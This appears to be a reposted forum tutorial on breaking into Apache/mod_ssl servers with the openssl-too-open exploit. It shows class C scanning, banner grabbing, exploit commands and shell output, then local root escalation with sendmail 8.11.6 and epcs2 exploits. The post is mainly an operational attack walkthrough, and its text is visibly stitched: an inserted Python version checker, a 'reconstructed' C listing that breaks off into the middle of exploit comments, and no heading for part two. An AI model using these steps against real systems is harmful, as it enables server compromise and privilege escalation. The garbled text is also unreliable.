Posted by ywg on 2018-11-28 08:08:06

Exploiting the Apache/OpenSSL vulnerability and escalating privileges

  Exploiting the Apache/OpenSSL vulnerability and escalating privileges
  --nightcat
  If you repost this, please keep the article intact.
  Part one: getting a shell.
  After spending some time on packetstorm, I came across the exploit openssl-too-open.tar.gz.
  Let's look at the package description:

  OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more
  This description says the exploit uses the KEY_ARG vulnerability in OpenSSL 0.9.6 to achieve its overflow, but the Apache/mod_ssl version matters as well. On most systems that meet these conditions the overflow succeeds and yields a shell running as nobody, on some even as root. The package contains a scanner and the exploit.
  It sounds tempting, so I downloaded it to take a look.
  nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
  nightcat@nightcat$cd openssl-too-open
  Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h
  Out of habit, I read the package's README first.
  nightcat@nightcat$ more README
  It gives some useful information:
  1. How to compile:
  Just run make; that produces openssl-too-open and openssl-scanner.
  2. Usage of openssl-too-open:
  Usage: ./openssl-too-open
  -a  target architecture (default is 0x00)
  -p  SSL port (default is 443)
  -c  open N apache connections before sending the shellcode (default is 30)
  -m  maximum number of open connections (default is 50)
  -v  verbose mode
  Supported architectures:
  0x00 - Gentoo (apache-1.3.24-r2)
  0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
  0x02 - Slackware 7.0 (apache-1.3.26)
  0x03 - Slackware 8.1-stable (apache-1.3.26)
  0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
  0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
  0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
  0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
  0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
  0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
  0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
  0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
  0x0c - SuSE Linux 7.0 (apache-1.3.12)
  0x0d - SuSE Linux 7.1 (apache-1.3.17)
  0x0e - SuSE Linux 7.2 (apache-1.3.19)
  0x0f - SuSE Linux 7.3 (apache-1.3.20)
  0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
  0x11 - SuSE Linux 8.0 (apache-1.3.23)
  0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
  0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
  0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
  0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
  /**** To succeed, you must match the system type and the Apache version exactly.
  ***** If it is 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
  ***** ./openssl-too-open -a 0x07 ip should do it!
  ****/
  3. Usage of openssl-scanner:
  Usage: ./openssl-scanner
  -i  file with target hosts
  -o  output log
  -a  append to output log (requires -o)
  -b  check for big endian servers
  -C  scan the entire
  -d  debug mode
  -w N  connection timeout in seconds
  Examples: ./openssl-scanner -d 192.168.0.1
  ./openssl-scanner -i hosts -o my.log -w 5
  ./openssl-scanner -C 192.168.0.0
  /**** scan a class C range:
  ***** ./openssl-scanner -C 192.168.0.0
  ****/
  4. A worked example:
  $ ./openssl-scanner -C 192.168.0.0
  : openssl-scanner : OpenSSL vulnerability scanner
  by Solar Eclipse
  Opening 255 connections . . . . . . . . . . done
  Waiting for all connections to finish . . . . . . . . . . . done
  192.168.0.136: Vulnerable
  $ nc 192.168.0.1 80
  HEAD / HTTP/1.0
  HTTP/1.1 200 OK
  Date: Tue, 17 Sep 2002 17:47:44 GMT
  Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
  Connection: close
  Content-Type: text/html
  ./openssl-too-open -a 0x14 192.168.0.1
  : openssl-too-open : OpenSSL remote exploit
  by Solar Eclipse
  : Opening 30 connections
  Establishing SSL connections
  : Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x810b3a0
  ssl1 : 0x810b360
  ssl2 : 0x810b4e0
  * Addresses don't match.
  : Opening 40 connections
  Establishing SSL connections
  : Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x8103830
  ssl1 : 0x80fd668
  ssl2 : 0x80fd668
  * Addresses don't match.
  : Opening 50 connections
  Establishing SSL connections
  : Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x8103830
  ssl1 : 0x8103830
  ssl2 : 0x8103830
  : Sending shellcode
  ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
  Reading tag
  Execution of stage1 shellcode succeeded, sending stage2
  Spawning shell...
  bash: no job control in this shell
  bash-2.05$

  bash-2.05$ uname -a;
  Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
  uid=48(apache) gid=48(apache) groups=48(apache)
  1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07

  USER TTY FROM LOGIN@
  bash-2.05$
  The README explains it all clearly.
  To summarize the process:
  1. Use openssl-scanner to scan a class C range and find vulnerable hosts.
  2. Use nc to grab the banner and obtain three things: the Apache version, the OpenSSL version and the operating system version.
  3. Run openssl-too-open to trigger the overflow and get a shell.
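  As an added example (not part of the original article or of the openssl-too-open package), here is the version check behind step 2 written for auditing your own servers: it extracts the OpenSSL version from an HTTP Server header like the one captured with nc above and reports whether it falls inside the range the README names (0.9.6d and below). The sample banners are constructed; the first one is the header shown in the README session.

```python
import re

# Constructed sample banners; the first is the Server header captured in the article.
SAMPLE_BANNERS = [
    "Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "Server: Apache/1.3.27 (Unix) mod_ssl/2.8.12 OpenSSL/0.9.6g",
    "Server: Apache/2.0.40 (Red Hat Linux) mod_ssl/2.0.40 OpenSSL/0.9.7",
    "Server: Apache/1.3.26 mod_ssl/2.8.10 OpenSSL/0.9.6",
    "Server: Microsoft-IIS/5.0",
]

# The README's affected range: "OpenSSL v0.9.6d and below".
LAST_AFFECTED = "0.9.6d"

_OPENSSL_RE = re.compile(r"OpenSSL/(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_openssl_version(banner):
    """Extract (major, minor, patch, letters) from a Server header, or None."""
    m = _OPENSSL_RE.search(banner)
    if m is None:
        return None
    major, minor, patch, letters = m.groups()
    return (int(major), int(minor), int(patch), letters)


def version_key(version):
    """Sortable key: 0.9.6 < 0.9.6a < 0.9.6b < ... because pre-1.0 OpenSSL used a
    letter suffix as the patch level, and an empty suffix is the base release."""
    major, minor, patch, letters = version
    return (major, minor, patch, tuple(ord(c) for c in letters))


def is_in_affected_range(banner):
    """True if the advertised OpenSSL is 0.9.6d or older, False if newer,
    None if the banner shows no OpenSSL version at all."""
    version = parse_openssl_version(banner)
    if version is None:
        return None
    limit = parse_openssl_version("OpenSSL/" + LAST_AFFECTED)
    return version_key(version) <= version_key(limit)


def audit(banners):
    """Map each banner to its verdict so a whole inventory can be reviewed at once."""
    return {b: is_in_affected_range(b) for b in banners}


if __name__ == "__main__":
    for banner, verdict in audit(SAMPLE_BANNERS).items():
        print(f"{str(verdict):5} {banner}")
```

  A banner check only reports what the server advertises: ServerTokens can hide the version and distributions often backport fixes without changing the version string, so treat the result as a triage hint rather than proof either way.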
  For the second step I wrote a program that makes grabbing the banner convenient.
  /* the www banner scanner, 80scanner version 1.0
  *
  * check the given ip or domain to get the web server banner
  *
  * to compile:
  * user$ gcc -o 80scanner 80scanner.c
  *
  * to use:
  * user$ ./80scanner somedomain.com (i.e. ./80scanner antionline.com)
  *
  * coded by nightcat
  * march 2004
  *
  */
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>
  #include <sys/types.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <arpa/inet.h>
  #include <netdb.h>

  int main(int argc, char *argv[])
  {
      int s, n;
      struct sockaddr_in victem;
      struct hostent *bad;
      char buffer[4096];
      /* the same request that was typed into nc in the README session */
      const char *request = "HEAD / HTTP/1.0\r\n\r\n";

      if (argc != 2) {
          printf("\nUsage:%s domain.com \n", argv[0]);
          exit(1);
      }
      if ((bad = gethostbyname(argv[1])) == NULL) {
          printf("Error getting hostname\n");
          exit(1);
      }
      printf("check web server version\n");
      printf("coded by nightcat\n");
      sleep(2);
      s = socket(AF_INET, SOCK_STREAM, 0);
      if (s < 0) {
          perror("socket");
          exit(1);
      }
      memset(&victem, 0, sizeof(victem));
      memcpy(&victem.sin_addr, bad->h_addr_list[0], bad->h_length);
      victem.sin_family = AF_INET;
      victem.sin_port = htons(80);
      if (connect(s, (struct sockaddr *)&victem, sizeof(victem)) < 0) {
          perror("connect");
          exit(1);
      }
      /* The listing on the page breaks off after connect(); the tail below is
         reconstructed: send the HEAD request and print the reply headers. */
      if (write(s, request, strlen(request)) < 0) {
          perror("write");
          exit(1);
      }
      while ((n = read(s, buffer, sizeof(buffer) - 1)) > 0) {
          buffer[n] = '\0';
          fputs(buffer, stdout);
      }
      close(s);
      return 0;
  }
  * will not work since the register will not point to pvpbuf. What we do is overwrite two
  * bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
  * address of pvpbuf until it is in the range of the ebp. Also our shellcode will be at a low
  * stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
  *
  * NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
  * be bypassed (in sendtolist()).
  *
  * have fun
  *
  * Greetz: Knight420, Stefano Biondi, nevez
  *
  It exploits the length-check problem in the prescan() function.
  2. Detailed usage:
  Local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)
  Usage: ./sendmail
  -h this lame message
  -t target
  -b brute force
  Id  Description     pvpbuf      zero        chunk      shellcode addr
  0)  Slackware 8.0   0xbffdfef4  0xbffe15d6  0x80f30a0  0xbffe1f36
  1)  Redhat 7.3      0xbffdfcd0  0xbffe19a6  0x80f30a0  0xbffe1f36
  2)  Redhat 7.2      0xbffdfcd0  0xbffe19a6  0x80f30a0  0xbffe1f36
  On Red Hat 7.2, simply run:
  ./sendmail -b -t 2 and you get root.
  The other one is epcs2.c:
  /*
  * epcs2 (improved by lst )
  * ~~~~~~~
  * exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
  *
  * originally by:
  * (c) 2001 Wojciech Purczynski / cliph /
  *
  * improved by:
  * lst
  *
  * This sploit does _not_ use brute force. It does not need that.
  * It does only one attempt to sploit the race condition in execve.
  * Parent process waits for a context-switch that occurs after
  * child task sleep in execve.
  *
  * It should work even on openwall-patched kernels (I haven't tested it).
  *
  * Compile it:
  * cc epcs.c -o epcs
  * Usage:
  * ./epcs
  *
  * It gives instant root shell with any of a suid binaries.
  *
  * If it does not work, try using some methods to ensure that execve
  * would sleep while loading binary file into memory,
  *
  * i.e.: cat /usr/lib/* >/dev/null 2>&1
  *
  * Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
  * This exploit does not work on 2.4.x because kernel won't set suid
  * privileges if user ptraces a binary.
  * But it is still exploitable on these kernels.
  *
  * Thanks to Bulba (he made me to take a look at this bug ;) )
  * Greetings to SigSegv team.
  *
  * -- d00t
  * improved by lst
  * props to kevin for most of the work
  *
  * now works on stack non-exec systems with some neat trickery for the automated
  * method, ie. no need to find the bss segment via objdump
  *
  * particularly it now rewrites the code instruction sets in the
  * dynamic linker _start segment and continues execution from there.
  *
  * an aside, due to the fact that the code self-modified, it wouldn't work
  * quite correctly on a stack non-exec system without playing directly with
  * the bss segment (ie no regs.eip = regs.esp change). this is much more
  * automated. however, do note that the previous version did not trigger stack
  * non-exec warnings due to how it was operating. note that the regs.eip = regs.esp
  * method will break on stack non-exec systems.
  *
  * as always.. enjoy.
  *
  */
  It exploits the execve/ptrace race condition.
  2. Usage:
  * Usage:
  * ./epcs
  It can simply be run directly:
  ./epcs gives root. If "enjoy" appears, it has worked.
  Part three: summary
  /***** Learn as much as you can about everything you can *****/
  What I want to say is:
  Understand what the tools you use do, and why they can be used this way; that is our real goal.
  *** This is only one way to understand the principles behind it. Do not use what I have described to cause damage; that is not why I wrote this article.
